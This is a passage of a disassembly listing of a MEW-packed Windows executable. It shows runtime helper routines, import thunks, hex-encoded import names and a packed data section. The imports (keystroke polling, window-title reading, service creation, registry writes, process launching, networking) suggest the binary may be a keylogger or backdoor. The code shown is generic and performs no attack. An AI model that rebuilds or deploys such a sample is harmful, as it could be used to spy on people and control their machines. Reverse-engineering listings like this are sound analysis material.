; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40AC3A proc near ; CODE XREF: sub_407125+8�p
; sub_40758E+1A�p ...
jmp dword_401184
sub_40AC3A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40AC40 proc near ; CODE XREF: sub_407282+29C�p
; sub_40AF35+10�p ...
jmp dword_401188
sub_40AC40 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40AC46 proc near ; CODE XREF: sub_407708+146�p
; sub_407E7D:loc_407F22�p ...
jmp dword_40118C
sub_40AC46 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40AC4C proc near ; CODE XREF: sub_407708+B4�p
; sub_407708+E4�p ...
jmp dword_401190
sub_40AC4C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40AC52 proc near ; CODE XREF: sub_407708+86�p
; sub_407BC9+5D�p ...
jmp dword_401194
sub_40AC52 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40AC58 proc near ; CODE XREF: sub_407BC9+132�p
; sub_407BC9+1E3�p
jmp dword_401198
sub_40AC58 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40AC5E proc near ; CODE XREF: sub_407F46+497�p
jmp dword_401134
sub_40AC5E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40AC64 proc near ; CODE XREF: sub_407F46+2A8�p
; sub_407F46+441�p
jmp dword_401130
sub_40AC64 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40AC6A proc near ; CODE XREF: sub_40862D+23�p
jmp dword_40112C
sub_40AC6A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40AC70 proc near ; CODE XREF: sub_40862D+11�p
; sub_4086A6+B9�p
jmp dword_401128
sub_40AC70 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40AC76 proc near ; CODE XREF: sub_4086A6+FD�p
; sub_4086A6+122�p
jmp dword_401124
sub_40AC76 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40AC7C proc near ; CODE XREF: sub_4086A6+3C�p
jmp dword_401120
sub_40AC7C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40AC82 proc near ; CODE XREF: sub_4098E2+358�p
; sub_40A77F+66�p
jmp dword_40111C
sub_40AC82 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40AC90 proc near ; CODE XREF: sub_409C9D+4D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
mov eax, [esp+4+arg_C]
or eax, eax
jnz short loc_40ACB1
mov ecx, [esp+4+arg_8]
mov eax, [esp+4+arg_4]
xor edx, edx
div ecx
mov eax, [esp+4+arg_0]
div ecx
mov eax, edx
xor edx, edx
jmp short loc_40AD01
; ---------------------------------------------------------------------------
loc_40ACB1: ; CODE XREF: sub_40AC90+7�j
mov ecx, eax
mov ebx, [esp+4+arg_8]
mov edx, [esp+4+arg_4]
mov eax, [esp+4+arg_0]
loc_40ACBF: ; CODE XREF: sub_40AC90+39�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_40ACBF
div ebx
mov ecx, eax
mul [esp+4+arg_C]
xchg eax, ecx
mul [esp+4+arg_8]
add edx, ecx
jb short loc_40ACEA
cmp edx, [esp+4+arg_4]
ja short loc_40ACEA
jb short loc_40ACF2
cmp eax, [esp+4+arg_0]
jbe short loc_40ACF2
loc_40ACEA: ; CODE XREF: sub_40AC90+4A�j
; sub_40AC90+50�j
sub eax, [esp+4+arg_8]
sbb edx, [esp+4+arg_C]
loc_40ACF2: ; CODE XREF: sub_40AC90+52�j
; sub_40AC90+58�j
sub eax, [esp+4+arg_0]
sbb edx, [esp+4+arg_4]
neg edx
neg eax
sbb edx, 0
loc_40AD01: ; CODE XREF: sub_40AC90+1F�j
pop ebx
retn 10h
sub_40AC90 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40AD10 proc near ; CODE XREF: sub_409C9D+29�p
; sub_409C9D+33�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
mov eax, [esp+8+arg_C]
or eax, eax
jnz short loc_40AD32
mov ecx, [esp+8+arg_8]
mov eax, [esp+8+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+8+arg_0]
div ecx
mov edx, ebx
jmp short loc_40AD73
; ---------------------------------------------------------------------------
loc_40AD32: ; CODE XREF: sub_40AD10+8�j
mov ecx, eax
mov ebx, [esp+8+arg_8]
mov edx, [esp+8+arg_4]
mov eax, [esp+8+arg_0]
loc_40AD40: ; CODE XREF: sub_40AD10+3A�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_40AD40
div ebx
mov esi, eax
mul [esp+8+arg_C]
mov ecx, eax
mov eax, [esp+8+arg_8]
mul esi
add edx, ecx
jb short loc_40AD6E
cmp edx, [esp+8+arg_4]
ja short loc_40AD6E
jb short loc_40AD6F
cmp eax, [esp+8+arg_0]
jbe short loc_40AD6F
loc_40AD6E: ; CODE XREF: sub_40AD10+4E�j
; sub_40AD10+54�j
dec esi
loc_40AD6F: ; CODE XREF: sub_40AD10+56�j
; sub_40AD10+5C�j
xor edx, edx
mov eax, esi
loc_40AD73: ; CODE XREF: sub_40AD10+20�j
pop esi
pop ebx
retn 10h
sub_40AD10 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40AD78 proc near ; CODE XREF: sub_409D65+E9�p
; sub_40A8E0+50�p
jmp dword_401118
sub_40AD78 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40AD7E proc near ; CODE XREF: sub_409D65+56�p
jmp dword_401114
sub_40AD7E endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40AD90 proc near ; CODE XREF: sub_409D65+43�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push edi
push esi
push ebx
xor edi, edi
mov eax, [esp+0Ch+arg_4]
or eax, eax
jge short loc_40ADB1
inc edi
mov edx, [esp+0Ch+arg_0]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_4], eax
mov [esp+0Ch+arg_0], edx
loc_40ADB1: ; CODE XREF: sub_40AD90+B�j
mov eax, [esp+0Ch+arg_C]
or eax, eax
jge short loc_40ADCD
inc edi
mov edx, [esp+0Ch+arg_8]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_C], eax
mov [esp+0Ch+arg_8], edx
loc_40ADCD: ; CODE XREF: sub_40AD90+27�j
or eax, eax
jnz short loc_40ADE9
mov ecx, [esp+0Ch+arg_8]
mov eax, [esp+0Ch+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+0Ch+arg_0]
div ecx
mov edx, ebx
jmp short loc_40AE2A
; ---------------------------------------------------------------------------
loc_40ADE9: ; CODE XREF: sub_40AD90+3F�j
mov ebx, eax
mov ecx, [esp+0Ch+arg_8]
mov edx, [esp+0Ch+arg_4]
mov eax, [esp+0Ch+arg_0]
loc_40ADF7: ; CODE XREF: sub_40AD90+71�j
shr ebx, 1
rcr ecx, 1
shr edx, 1
rcr eax, 1
or ebx, ebx
jnz short loc_40ADF7
div ecx
mov esi, eax
mul [esp+0Ch+arg_C]
mov ecx, eax
mov eax, [esp+0Ch+arg_8]
mul esi
add edx, ecx
jb short loc_40AE25
cmp edx, [esp+0Ch+arg_4]
ja short loc_40AE25
jb short loc_40AE26
cmp eax, [esp+0Ch+arg_0]
jbe short loc_40AE26
loc_40AE25: ; CODE XREF: sub_40AD90+85�j
; sub_40AD90+8B�j
dec esi
loc_40AE26: ; CODE XREF: sub_40AD90+8D�j
; sub_40AD90+93�j
xor edx, edx
mov eax, esi
loc_40AE2A: ; CODE XREF: sub_40AD90+57�j
dec edi
jnz short loc_40AE34
neg edx
neg eax
sbb edx, 0
loc_40AE34: ; CODE XREF: sub_40AD90+9B�j
pop ebx
pop esi
pop edi
retn 10h
sub_40AD90 endp
; ---------------------------------------------------------------------------
loc_40AE3A: ; CODE XREF: MEW:0040AFF9�j
jmp dword_401110
; =============== S U B R O U T I N E =======================================
sub_40AE40 proc near ; CODE XREF: MEW:00409FA6�p
push 0FFFFFFFFh
push eax
mov eax, large fs:0
push eax
mov eax, [esp+0Ch]
mov large fs:0, esp
mov [esp+0Ch], ebp
lea ebp, [esp+0Ch]
push eax
retn
sub_40AE40 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40AE60 proc near ; CODE XREF: sub_40A9CA+1D�p
jmp dword_40110C
sub_40AE60 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40AE66 proc near ; CODE XREF: sub_407F46+133�p
jmp dword_401204
sub_40AE66 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40AE70 proc near ; CODE XREF: MEW:0040A016�p
; MEW:0040A044�p ...
arg_0 = dword ptr 4
push 0
push [esp+4+arg_0]
call sub_40AEDF
retn 4
sub_40AE70 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AE7E proc near ; CODE XREF: MEW:0040A035�p
; MEW:0040A0B7�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_4]
and [ebp+var_4], 0
test eax, eax
jz short loc_40AED0
mov ecx, [eax]
lea edx, [ebp+arg_4]
push edx
push offset dword_404370
push eax
call dword ptr [ecx]
test eax, eax
jl short loc_40AED0
mov eax, [ebp+arg_4]
push esi
push [ebp+arg_8]
mov ecx, [eax]
push eax
call dword ptr [ecx+0Ch]
mov esi, eax
mov eax, [ebp+arg_4]
push eax
mov ecx, [eax]
call dword ptr [ecx+8]
test esi, esi
pop esi
jnz short loc_40AED0
lea eax, [ebp+var_4]
push eax
push 0
call dword_4011C0
test eax, eax
jz short loc_40AED0
and [ebp+var_4], 0
loc_40AED0: ; CODE XREF: sub_40AE7E+D�j
; sub_40AE7E+1F�j ...
push [ebp+var_4]
push [ebp+arg_0]
call sub_40AEDF
leave
retn 0Ch
sub_40AE7E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AEDF proc near ; CODE XREF: sub_40AE70+6�p
; sub_40AE7E+58�p
var_10 = byte ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push 0
lea ecx, [ebp+var_10]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40AF03
lea eax, [ebp+var_10]
push offset dword_40B068
push eax
call sub_40AFC6
sub_40AEDF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40AF03 proc near ; CODE XREF: sub_40AEDF+11�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
mov eax, [esp+arg_0]
push esi
mov esi, ecx
and dword ptr [esi+0Ch], 0
mov [esi+4], eax
mov eax, [esp+4+arg_4]
mov dword ptr [esi], offset off_404494
test eax, eax
mov [esi+8], eax
jz short loc_40AF2F
cmp [esp+4+arg_8], 0
jz short loc_40AF2F
mov ecx, [eax]
push eax
call dword ptr [ecx+4]
loc_40AF2F: ; CODE XREF: sub_40AF03+1D�j
; sub_40AF03+24�j
mov eax, esi
pop esi
retn 0Ch
sub_40AF03 endp
; =============== S U B R O U T I N E =======================================
sub_40AF35 proc near ; DATA XREF: MEW:off_404494�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_40AF7E
test [esp+4+arg_0], 1
jz short loc_40AF4B
push esi
call sub_40AC40
pop ecx
loc_40AF4B: ; CODE XREF: sub_40AF35+D�j
mov eax, esi
pop esi
retn 4
sub_40AF35 endp
; ---------------------------------------------------------------------------
mov eax, [esp+4]
push esi
mov esi, ecx
mov ecx, [eax+4]
mov [esi+4], ecx
mov eax, [eax+8]
and dword ptr [esi+0Ch], 0
mov [esi+8], eax
test eax, eax
mov dword ptr [esi], offset off_404494
jz short loc_40AF78
mov ecx, [eax]
push eax
call dword ptr [ecx+4]
loc_40AF78: ; CODE XREF: MEW:0040AF70�j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_40AF7E proc near ; CODE XREF: sub_40AF35+3�p
; DATA XREF: MEW:0040B06C�o
push esi
mov esi, ecx
mov eax, [esi+8]
mov dword ptr [esi], offset off_404494
test eax, eax
jz short loc_40AF94
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_40AF94: ; CODE XREF: sub_40AF7E+E�j
mov esi, [esi+0Ch]
test esi, esi
jz short loc_40AFA2
push esi
call dword_4010C0 ; LocalFree
loc_40AFA2: ; CODE XREF: sub_40AF7E+1B�j
pop esi
retn
sub_40AF7E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40AFA4 proc near ; CODE XREF: sub_404530+1CE�p
; sub_404530+38C�p ...
jmp dword_401104
sub_40AFA4 endp
; =============== S U B R O U T I N E =======================================
sub_40AFAA proc near ; DATA XREF: MEW:off_40449C�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_40AFCC
test [esp+4+arg_0], 1
jz short loc_40AFC0
push esi
call sub_40AC40
pop ecx
loc_40AFC0: ; CODE XREF: sub_40AFAA+D�j
mov eax, esi
pop esi
retn 4
sub_40AFAA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40AFC6 proc near ; CODE XREF: sub_40AEDF+1F�p
jmp dword_401108
sub_40AFC6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40AFCC proc near ; CODE XREF: sub_40AFAA+3�p
jmp dword_40119C
sub_40AFCC endp
; ---------------------------------------------------------------------------
align 4
lea ecx, [ebp-10h]
jmp loc_40A44F
; ---------------------------------------------------------------------------
loc_40AFDC: ; DATA XREF: MEW:0040B02C�o
lea ecx, [ebp-24h]
jmp loc_40A44F
; ---------------------------------------------------------------------------
lea ecx, [ebp-1Ch]
jmp loc_40A44F
; ---------------------------------------------------------------------------
lea ecx, [ebp-20h]
jmp loc_40A44F
; ---------------------------------------------------------------------------
loc_40AFF4: ; DATA XREF: MEW:loc_409FA1�o
mov eax, offset dword_40B000
jmp loc_40AE3A
; ---------------------------------------------------------------------------
align 10h
dword_40B000 dd 19930520h, 4, 40B020h, 5 dup(0) dd 0FFFFFFFFh, 40AFD4h, 0
dd offset loc_40AFDC
dd 1, 40AFE4h, 2, 40AFECh, 0
dd offset dword_404370+10h
dd 0
dd 0FFFFFFFFh, 0
dd 10h, 40AF51h, 0
dword_40B060 dd 1, 40B040h dword_40B068 dd 0 dd offset sub_40AF7E
dd 0
dd offset dword_40B060
byte_40B078 db 0 ; DATA XREF: MEW:off_401BA0�o
; MEW:00406EC3�r ...
align 10h
dword_40B080 dd 6 dup(0) ; sub_407282+2AF�o
dword_40B098 dd 0 ; sub_407E2D+3C�r ...
dword_40B09C dd 0 ; sub_4086A6+EE�r ...
dword_40B0A0 dd 0 ; sub_408C2B:loc_408C51�o ...
dword_40B0A4 dd 0 ; sub_408C7B+1B�w ...
dword_40B0A8 dd 0 ; sub_408C7B+77�w ...
dword_40B0AC dd 0 dword_40B0B0 dd 0 dword_40B0B4 dd 0 dword_40B0B8 dd 0 dword_40B0BC dd 0 ; sub_408C2B+35�r ...
dword_40B0C0 dd 0 ; sub_408C7B+85�w ...
align 8
dword_40B0C8 dd 0 ; sub_404530+95D�r ...
align 10h
word_40B0D0 dw 0 ; DATA XREF: sub_404530+15E�r
; MEW:00407013�r ...
byte_40B0D2 db 0 ; DATA XREF: sub_408C7B+96�r
; sub_40933F+2C�w ...
align 8
dword_40B0D8 dd 0 ; sub_40A45C+DC�w ...
dword_40B0DC dd 0 ; sub_40A45C+6F�w ...
dword_40B0E0 dd 0 ; sub_40785E+41�r ...
dword_40B0E4 dd 0 ; sub_40785E+AC�r ...
dword_40B0E8 dd 0 ; sub_40A56C+53�w ...
dword_40B0EC dd 0 ; sub_40A56C+4D�w
dword_40B0F0 dd 0 dword_40B0F4 dd 53h dup(0) byte_40B240 db 0 ; DATA XREF: sub_404530+236�r
; sub_404530+252�w ...
align 4
dword_40B244 dd 0 ; sub_404530+166�r ...
byte_40B248 db 0 ; DATA XREF: sub_404530+93F�w
; sub_407207:loc_407233�r ...
align 2
word_40B24A dw 0 ; DATA XREF: sub_404530+AB0�r
; sub_405DB7+48�r ...
align 10h
dword_40B250 dd 0 ; sub_404530+7A9�o
word_40B254 dw 0 ; DATA XREF: sub_404530+5CE�w
; sub_404530:loc_404B0A�r ...
align 4
dword_40B258 dd 0 ; sub_404530+600�w
dword_40B25C dd 0 dword_40B260 dd 0 dword_40B264 dd 0 ; sub_404530:loc_404C85�w ...
dword_40B268 dd 0 ; sub_404530+731�w
byte_40B26C db 0 ; DATA XREF: sub_404530+77B�w
; sub_404530+79B�w
align 10h
dword_40B270 dd 0 ; sub_407F46+525�w ...
byte_40B274 db 0 ; DATA XREF: sub_404530+31A�w
; sub_405185+D5�r ...
align 4
dword_40B278 dd 0 ; sub_4055A6+1DE�r ...
dword_40B27C dd 0 ; sub_405185+8F�w ...
dword_40B280 dd 0 ; sub_405185+94�r ...
dword_40B284 dd 23h dup(0) dword_40B310 dd 41h dup(0) dword_40B414 dd 52Ah dup(0) dd offset dword_401044
dd 4E52454Bh, 32334C45h, 6C6C642Eh, 65478000h, 73614C74h
dd 72724574h, 8000726Fh, 61657243h, 754D6574h, 41786574h
dd 65538000h, 6C694674h, 6D695465h, 47800065h, 69467465h
dd 6954656Ch, 8000656Dh, 61657243h, 69466574h, 41656Ch
dd 61655380h, 50686372h, 41687461h, 78458000h, 646E6170h
dd 69766E45h, 6D6E6F72h, 53746E65h, 6E697274h, 417367h
dd 74655380h, 656C6946h, 72747441h, 74756269h, 417365h
dd 74654780h, 656C6946h, 72747441h, 74756269h, 417365h
dd 69725780h, 69466574h, 8000656Ch, 54746547h, 50706D65h
dd 41687461h, 65528000h, 7361656Ch, 74754D65h, 80007865h
dd 6E65704Fh, 6574754Dh, 80004178h, 79706F43h, 656C6946h
dd 6C800041h, 63727473h, 417461h, 65724380h, 45657461h
dd 746E6576h, 53800041h, 72457465h, 4D726F72h, 65646Fh
dd 65724680h, 62694C65h, 79726172h, 65478000h, 6F725074h
dd 64644163h, 73736572h, 6F4C8000h, 694C6461h, 72617262h
dd 80004179h, 72657551h, 72655079h, 6D726F66h, 65636E61h
dd 71657246h, 636E6575h, 51800079h, 79726575h, 66726550h
dd 616D726Fh, 4365636Eh, 746E756Fh, 80007265h, 56746547h
dd 69737265h, 78456E6Fh, 47800041h, 61626F6Ch, 6D654D6Ch
dd 5379726Fh, 75746174h, 6C800073h, 63727473h, 417970h
dd 74736C80h, 79706372h, 8000416Eh, 7274736Ch, 41706D63h
dd 65538000h, 72685474h, 50646165h, 726F6972h, 797469h
dd 65724380h, 50657461h, 65636F72h, 417373h, 69615780h
dd 726F4674h, 676E6953h, 624F656Ch, 7463656Ah, 6C438000h
dd 4865736Fh, 6C646E61h, 4C800065h, 6C61636Fh, 65657246h
dd 65538000h, 65764574h, 8000746Eh, 4D746547h, 6C75646Fh
dd 6E614865h, 41656C64h, 736C8000h, 656C7274h, 8000416Eh
dd 4D746547h, 6C75646Fh, 6C694665h, 6D614E65h, 80004165h
dd 61657243h, 68546574h, 64616572h, 65448000h, 6574656Ch
dd 74697243h, 6C616369h, 74636553h, 6E6F69h, 696E4980h
dd 6C616974h, 43657A69h, 69746972h, 536C6163h, 69746365h
dd 6E416E6Fh, 69705364h, 756F436Eh, 8000746Eh, 65746E45h
dd 69724372h, 61636974h, 6365536Ch, 6E6F6974h, 65548000h
dd 6E696D72h, 54657461h, 61657268h, 4C800064h, 65766165h
dd 74697243h, 6C616369h, 74636553h, 6E6F69h, 69784580h
dd 72685474h, 646165h, 69784580h, 6F725074h, 73736563h
dd 6C538000h, 706565h, 74654780h, 74737953h, 69446D65h
dd 74636572h, 4179726Fh, 65478000h, 63695474h, 756F436Bh
dd 0FF00746Eh, 0D0FFFFFFh, 55004011h, 33524553h, 6C642E32h
dd 4780006Ch, 69577465h, 776F646Eh, 74786554h, 47800041h
dd 6F467465h, 72676572h, 646E756Fh, 646E6957h, 8000776Fh
dd 41746547h, 636E7973h, 5379654Bh, 65746174h, 73778000h
dd 6E697270h, 416674h, 74654780h, 5379654Bh, 65746174h
dd 0FFFFFF00h, 401000FFh, 56444100h, 33495041h, 6C642E32h
dd 4380006Ch, 74616572h, 72655365h, 65636976h, 43800041h
dd 676E6168h, 72655365h, 65636976h, 666E6F43h, 41326769h
dd 74538000h, 53747261h, 69767265h, 416563h, 67655280h
dd 61657243h, 654B6574h, 41784579h, 65528000h, 65704F67h
dd 79654B6Eh, 417845h, 67655280h, 56746553h, 65756C61h
dd 417845h, 67655280h, 736F6C43h, 79654B65h, 704F8000h
dd 43536E65h, 616E614Dh, 41726567h, 704F8000h, 65536E65h
dd 63697672h, 80004165h, 736F6C43h, 72655365h, 65636976h
dd 646E6148h, 8000656Ch, 69676552h, 72657473h, 76726553h
dd 43656369h, 486C7274h, 6C646E61h, 417265h, 61745380h
dd 65537472h, 63697672h, 72744365h, 7369446Ch, 63746170h
dd 41726568h, 65448000h, 6574656Ch, 76726553h, 656369h
dd 6E6F4380h, 6C6F7274h, 76726553h, 656369h, 67655280h
dd 6D756E45h, 4579654Bh, 80004178h, 53746553h, 69767265h
dd 74536563h, 73757461h, 0FFFFFF00h, 4011C8FFh, 45485300h
dd 32334C4Ch, 6C6C642Eh, 68538000h, 456C6C65h, 75636578h
dd 416574h, 0FFFFFFFFh, 4011A4h, 4342444Fh, 642E3233h
dd 6C6Ch, 170000h, 4A0000h, 280000h, 20000h, 0A0000h, 0FF1E0000h
dd 4FFFFFFh, 4D004011h, 52435653h, 6C642E54h, 5F80006Ch
dd 63727473h, 69706Dh, 78435F80h, 72685478h, 7845776Fh
dd 74706563h, 6E6F69h, 6D656D80h, 706D63h, 435F5F80h, 72467878h
dd 48656D61h, 6C646E61h, 80007265h, 6C696563h, 735F8000h
dd 6972706Eh, 66746Eh, 72747380h, 746163h, 72747380h, 72686372h
dd 77668000h, 65746972h, 735F8000h, 696E7274h, 706D63h
dd 72747380h, 726863h, 63737380h, 666E61h, 72747380h, 6C756F74h
dd 74738000h, 61636E72h, 73800074h, 6E697270h, 80006674h
dd 73727473h, 80007274h, 63727473h, 80007970h, 40323F3Fh
dd 41504159h, 5A404958h, 74618000h, 8000696Fh, 63727473h
dd 8000706Dh, 74727473h, 80006B6Fh, 6378655Fh, 5F747065h
dd 646E6168h, 3372656Ch, 665F8000h, 6C6F74h, 70737680h
dd 746E6972h, 73800066h, 656C7274h, 6D80006Eh, 65736D65h
dd 66800074h, 656572h, 61657280h, 636F6C6Ch, 616D8000h
dd 636F6C6Ch, 74738000h, 70636E72h, 6D800079h, 70636D65h
dd 72800079h, 646E61h, 61727380h, 8000646Eh, 40333F3Fh
dd 50584159h, 5A405841h, 63668000h, 65736F6Ch, 72668000h
dd 646165h, 706F6680h, 80006E65h, 65657366h, 3F80006Bh
dd 7974313Fh, 695F6570h, 406F666Eh, 45415540h, 5A5840h
dd 0FFFFFFFFh, 4011E8h, 494E4957h, 2E54454Eh, 6C6C64h
dd 746E4980h, 656E7265h, 74654774h, 6E6E6F43h, 65746365h
dd 61745364h, 0FF006574h, 0F0FFFFFFh, 57004011h, 335F3253h
dd 6C642E32h, 6Ch, 1100h, 0D00h, 0
dd 57801000h, 6F534153h, 74656B63h, 41h, 9600h, 3200h
dd 400h, 0C00h, 100h, 1400h, 1500h, 0B00h, 3800h, 7200h
dd 6E00h, 800h, 1600h, 300h, 0F00h, 200h, 1200h, 7300h
dd 0A00h, 3300h, 700h, 1300h, 0FFFF0900h, 11C0FFFFh, 4C4F0040h
dd 54554145h, 642E3233h, 6C6Ch, 80C70000h, 0
MEW ends
; Section 2. (virtual address 0000D000)
; Virtual size : 00014000 ( 81920.)
; Section size in file : 00014000 ( 81920.)
; Offset to raw data for section: 0000D000
; Flags C00000E0: Text Data Bss Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Uninitialized
; Segment permissions: Read/Write
__u_____ segment para public 'BSS' use32
assume cs:__u_____
;org 40D000h
assume es:nothing, ss:nothing, ds:MEW, fs:nothing, gs:nothing
dword_40D000 dd 0FF41C933h, 0FFC91313h, 0C3F87213h, 7C801D77h, 7C80ADA0h
; DATA XREF: __u_____:0040D018�o
dd 0
dd offset dword_40D000
dd 40012Ch, 40950Fh, 40C8BCh, 40103844h, 52454B07h, 334C304Eh
dd 64382E32h, 800FF06Ch, 87746547h, 45437361h, 9E6F8B72h
dd 0FF43771Ch, 4D33E7F7h, 78081975h, 87531C41h, 6C694638h
dd 6D4754F7h, 0D0E53FDh, 10412842h, 0E3CF2717h, 74506863h
dd 451BC322h, 6EF17078h, 7699DB64h, 6FA2BC69h, 53746756h
dd 14FF3E2Fh, 0A74F7367h, 6225D9AEh, 2973C791h, 57591447h
dd 225C16A1h, 29547B1Fh, 9F5C706Dh, 1128B452h, 1C989FACh
dd 0BCD0704Fh, 6F43A1AAh, 8E5D79F5h, 8ECD88D6h, 0A5AA6037h
dd 0AA764550h, 197E1285h, 64CD4DE5h, 3846B39Bh, 0E47E4CB3h
dd 5379BAA1h, 340E5066h, 39644163h, 3EC7732Ch, 613D4C20h
dd 73611DD3h, 99657551h, 66085010h, 0DB6D7894h, 77E6633Eh
dd 12CA2671h, 81541B79h, 0D8B47587h, 56524C1Eh, 69487310h
dd 9F452903h, 9D6CBC3Fh, 4D146162h, 795064CAh, 95051084h
dd 0A8747375h, 0A41B60Ah, 0B646EE5h, 85AFF011h, 0C14A6854h
dd 8C359A64h, 0D079114Ah, 0AAA1252h, 0D06F28A6h, 53384632h
dd 0FA015F4Ah, 0D16A624Fh, 4B6AFF63h, 481222D6h, 903F8354h
dd 0EE6334C9h, 0FF65EB24h, 9C350A24h, 6C750445h, 76362634h
dd 96EAFB12h, 1F4DA41Ch, 0E46D614Eh, 8D335A47h, 84441C24h
dd 0AE431CB2h, 53B95992h, 0CEE5E9A2h, 239B492Eh, 7A57207Ch
dd 0C8418D1Bh, 0A24570E9h, 1E951A34h, 3D7C1F24h, 6D28CD54h
dd 32650B46h, 95760C4Ch, 0D14B2864h, 0C902222h, 0DC450A57h
dd 70859307h, 79A5BD37h, 2666CB14h, 69357C44h, 8CD26C51h
dd 0AC6B8C54h, 3FF6280h, 3C011D0h, 4B05355h, 57E60199h
dd 506FF6FAh, 0F5788677h, 766F9237h, 6579678Eh, 111A4964h
dd 20734115h, 4B7863A2h, 50AAC091h, 704D777Fh, 66527CD8h
dd 41184732h, 10C162h, 0E6564441h, 64495650h, 0C9414356h
dd 6316C1DEh, 68245323h, 1067157Bh, 777C9B90h, 0D932FC66h
dd 0CE72872Fh, 0EF902694h, 68396752h, 1121F0BDh, 0F48F524h
dd 56D6A45Ah, 86842284h, 0FE361065h, 1F1E9B41h, 0D04DDB53h
dd 7229D296h, 81A11041h, 800A51CDh, 7FA62D48h, 723E24FDh
dd 142497A5h, 0D73F1BA1h, 341AD09Bh, 0E8C75644h, 3BF60D8Bh
dd 1E901422h, 0D10DBBDAh, 5D6CD144h, 0F8B3A810h, 0B76D7529h
dd 4919304Dh, 34520B37h, 7F11C810h, 5897485Ch, 0B6DDB798h
dd 13600EB5h, 41E24AC8h, 5A49123h, 4342444Fh, 64032236h
dd 484A0917h, 22029128h, 2B1E500Ah, 534D8804h, 52435608h
dd 5F806254h, 696357CCh, 8C784315h, 0D41A44D5h, 708004B6h
dd 0E62158D9h, 393B68CBh, 242E261Dh, 0B6F8A3F6h, 69554826h
dd 0ED4CFE3Fh, 5D6416D6h, 0F4580856h, 0B9776645h, 266321AEh
dd 23913404h, 5EEC6824h, 926E5672h, 628D4234h, 6E092554h
dd 4F2D3E24h, 0B24F07A2h, 3F10CE02h, 59403222h, 58913963h
dd 0B15ADD49h, 696F561Ch, 570D1C49h, 0D56B2099h, 0DDBB4D65h
dd 33A55868h, 326625CDh, 5776BF94h, 0DA8C34E6h, 0E12EE3F7h
dd 2A690366h, 33260D4Ch, 8342F34h, 0ACEE9036h, 0FE088302h
dd 72FD0A7h, 33228C90h, 88D5855h, 634C668Ch, 4C4B9133h
dd 0A8FE9F80h, 0BFFD6170h, 2B6BA826h, 66A1315Ch, 0CEFC5F22h
dd 55234030h, 58A94541h, 22B4235Ah, 495719E8h, 2745044Eh
dd 1B97C8Ah, 3594513Ah, 99272534h, 641E6312h, 0F08A3A63h
dd 32923F2Fh, 11E3385Fh, 6140D89h, 38801001h, 0B9A14172h
dd 38D656Bh, 9229610h, 0C044432h, 14120189h, 0B481524h
dd 72223891h, 89086E44h, 24031216h, 122FDC0Fh, 37377389h
dd 7093332h, 94A1324h, 40C0448Bh, 41454C4Fh, 8D545355h
dd 80C786h, 411FDFh, 8613883h, 4490074h, 6A5756FFh, 110E8905h
dd 41018B5Ah, 0E6C10871h, 3B60FCCh, 40F70B38h, 1A73894Ah
dd 0EA750101h, 56C35E5Fh, 33043083h, 79B057C0h, 0D2078508h
dd 55532D7Eh, 0EED1DAF1h, 0E3BE0C8h, 2B0472FEh, 81010C83h
dd 0D8020DC7h, 8B0C1073h, 79E7C111h, 0B85C32Ah, 0A00342FDh
